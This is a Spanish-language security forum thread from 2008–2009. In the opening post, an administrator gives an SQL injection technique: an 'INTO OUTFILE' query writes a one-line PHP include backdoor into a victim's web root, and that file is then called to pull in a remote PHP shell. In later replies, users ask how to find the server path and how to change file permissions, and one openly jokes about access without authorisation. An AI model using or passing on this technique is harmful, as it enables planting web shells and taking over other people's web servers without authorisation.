La Comunidad DragonJAR  

Retroceder   La Comunidad DragonJAR > Seguridad > Seguridad en Bases de Datos

¿Qué es La Comunidad DragonJAR?

DragonJAR.org es una comunidad de investigadores, estudiantes, profesionales y entusiastas de la Seguridad Informática, En la cual se busca darle un enfoque eminentemente práctico a la teoría sin olvidar las bases esenciales de esta.

De esta manera se Tratará de ofrecer soluciones útiles a los usuarios, tanto novatos, estudiantes, como a los profesionales e investigadores, Teniendo presente que el mundo de la seguridad informática y la información es un medio que se auto inventa constantemente.

La Comunidad DragonJAR es un espacio abierto y libre para cualquier persona que desee compatir en un ambiente digital sus conocimientos o sus dudas. El registro es gratuito, toma poco tiempo y te permite disfrutar de todas las características del sitio.

Si es tu primera visita, quizás deberías visitar la Ayuda para aprender un poco sobre el uso de los foros, para empezar a ver mensajes, selecciona el foro que quieres visitar de la lista de abajo.

Respuesta
 
LinkBack Herramientas Desplegado
Antiguo 03-Oct-2008, 18:17   #1
Administradores
 
Avatar de DragoN
 
Fecha de Ingreso: 11-August-2008
Ubicación: Manizales
Mensajes: 1.013
Gracias: 418
Agradecido 311 veces en 148 Mensajes
DragoN está en el buen camino
Predeterminado Consulta SQL para crear archivo que permita RFI

Este es un pequeño tip muy sencillo pero siempre útil, cuando es posible realizar SQL injection en un sistema podremos crear un archivo que permita la inyección de ficheros remotos (una shell en php por ejemplo) haciendo uso de un 'Union Select' de la siguiente forma.

Código:
SELECT '<?php include($_GET[$f]); ?>'
INTO OUTFILE 'c:\\RUTASERVIDOR\\www\\archivo.php'
en RUTASERVIDOR debemos colocar la ruta en la que se encuentra nuestro servidor web (si no la conocemos podremos generar un error en la aplicación para intentar obtenerla) y archivo.php es el fichero que se crea con la cadena '<?php include($_GET[$f]); ?>' dentro de el.

Después de esto solo debemos llamar el "archivo.php" de la siguiente forma archivo.php?abrir=http://RUTADESHELL/shell.txt y listo.
DragoN está desconectado   Responder Citando
Antiguo 11-Dec-2008, 18:27   #2
Dragonauta
 
Avatar de luisascoobydoo
 
Fecha de Ingreso: 11-December-2008
Ubicación: Pereira, Colombia...
Mensajes: 182
Gracias: 11
Agradecido 11 veces en 9 Mensajes
luisascoobydoo está en el buen camino
Predeterminado Re: Consulta SQL para crear archivo que permita RFI

hola,
buscando en la web encontre algo sobre shell pero no estoy segura de que hacer, acerca de lo que me dices alli, si me puedieses colaborar gracias,
luisascoobydoo@gmail.com
LSD
luisascoobydoo está desconectado   Responder Citando
Antiguo 08-Jan-2009, 04:18   #3
Recien Nacido
 
Fecha de Ingreso: 07-January-2009
Mensajes: 5
Gracias: 0
Agradecido 0 veces en 0 Mensajes
Hyard está en el buen camino
Predeterminado Re: Consulta SQL para crear archivo que permita RFI

El objetivo es crear un php, en este caso "archivo.php", en un sitio web, pero para ejecutar la consulta se debe saber la ruta del servidor, ??? , como la obtengo?

DragoN, nose si estoy mal, pero el archivo que se crea en el sitio de la victima, "arvhivo.php", es vacio!!!

La idea es subir, como dices, po ejemplo una shell, pero pues la creo , Y? como la subo?

La unica forma que se me ocurre es con paginas vulnerables a rfi, teniendo mi shell en otro host de la siguiente manera:
http://www.sitio_victima.com/index.p...r/mi_shell.php
pero en este caso sobraria la consulta.


O en la consulta en "RUTASERVIDOR" es mi servidor, y pues inyecto la consulta en algun form de una pagina? algo asi como un ftp al ese sitio pero sin autorizacion XD?

Sea como sea, si pequeño tip, pero muy bueno, gracias DragoN ;D

Creo que estoy un poco confundido ??? help me pls!!!


Hyard está desconectado   Responder Citando
Antiguo 08-Jan-2009, 04:26   #4
Recien Nacido
 
Fecha de Ingreso: 07-January-2009
Mensajes: 5
Gracias: 0
Agradecido 0 veces en 0 Mensajes
Hyard está en el buen camino
Predeterminado Re: Consulta SQL para crear archivo que permita RFI

Ahhh se me olvido, por medio de la shell hay forma de modificar los permisos o atributos de los ficheros del sitio?
Hyard está desconectado   Responder Citando
Antiguo 08-Jan-2009, 15:14   #5
Dragonauta
 
Avatar de PerverthsO
 
Fecha de Ingreso: 11-August-2008
Mensajes: 185
Gracias: 9
Agradecido 45 veces en 23 Mensajes
PerverthsO está en el buen camino
Predeterminado Re: Consulta SQL para crear archivo que permita RFI

depende de los privilegios q tengas para poder hacer esas cosas
__________________
PerverthsO
PerverthsO está desconectado   Responder Citando
Antiguo 07-Feb-2009, 10:19   #6
Recien Nacido
 
Fecha de Ingreso: 07-February-2009
Mensajes: 1
Gracias: 0
Agradecido 0 veces en 0 Mensajes
Jocabek está en el buen camino
Predeterminado Consulta SQL para crear archivo que permita RFI

Hola amigos de la comunidad deseo que alquien me ayude a resolver un problema urgente que tengo es sobre como poder borrar algunas cosillas que me afectan.
Jocabek está desconectado   Responder Citando
Respuesta

Etiquetas
archivo, consulta, crear, permita, rfi, sql

Herramientas
Desplegado

Normas de Publicación
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes

Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks are Activado
Pingbacks are Activado
Refbacks are Activado


Temas Similares
Tema Autor Foro Respuestas Último mensaje
Manuales para crear aplicaciones para el iPhone (es Buen negocio) DragoN Apple 2 22-Dec-2009 14:19
Como crear Virus para GNU Linux en 5 pasos DragoN GNU/Linux 6 27-Feb-2009 16:26
Tuto como crear una unidad virtual para una carpeta hecky Principiantes 30 20-Feb-2009 19:04
Toda la equipación que necesitas para crear una web, Ya no hay escusas! DaXGoN Desarrollo y Diseño Web 15 11-Nov-2008 16:05
Crear Themes para Joomla!, WordPress... UrbaN77 Desarrollo y Diseño Web 3 14-Sep-2008 23:37


La franja horaria es GMT -6. Ahora son las 05:40.